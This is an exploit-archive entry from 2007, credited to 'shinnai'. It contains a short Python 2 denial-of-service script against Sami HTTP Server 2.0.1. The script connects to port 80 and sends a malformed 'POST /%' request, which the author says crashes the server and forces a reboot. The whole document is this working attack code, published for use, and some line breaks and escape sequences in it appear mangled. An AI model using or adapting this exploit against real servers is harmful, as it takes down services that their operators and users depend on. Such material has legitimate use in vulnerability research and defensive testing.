[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Sami HTTP Server 2.0.1 POST Request Denial of Service Exploit
# Published : 2007-04-12
# Author : shinnai
# Previous Title : Gran Paradiso 3.0a3 non-existent applet Denial of Service Exploit
# Next Title : Microsoft Office Word 2007 Multiple Vulnerabilities


# usr/bin/python

import socket

print
"-------------------------------------------------------------------------"
print " Sami HTTP Server 2.0.1 POST request Denial of Service"
print " url: http://www.karjasoft.com"
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.org"
print " Sending to the webserver a 'POST /%' will cause an abnormal
termination"
print " of the program that requires the reboot of the webserver."
print
"-------------------------------------------------------------------------"

try:
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   conn = s.connect(("127.0.0.1",80))
   s.send("POST /% HTTP/1.0 nn")
except:
   print "Unable to connect. exiting."

# www.Syue.com [2007-04-12]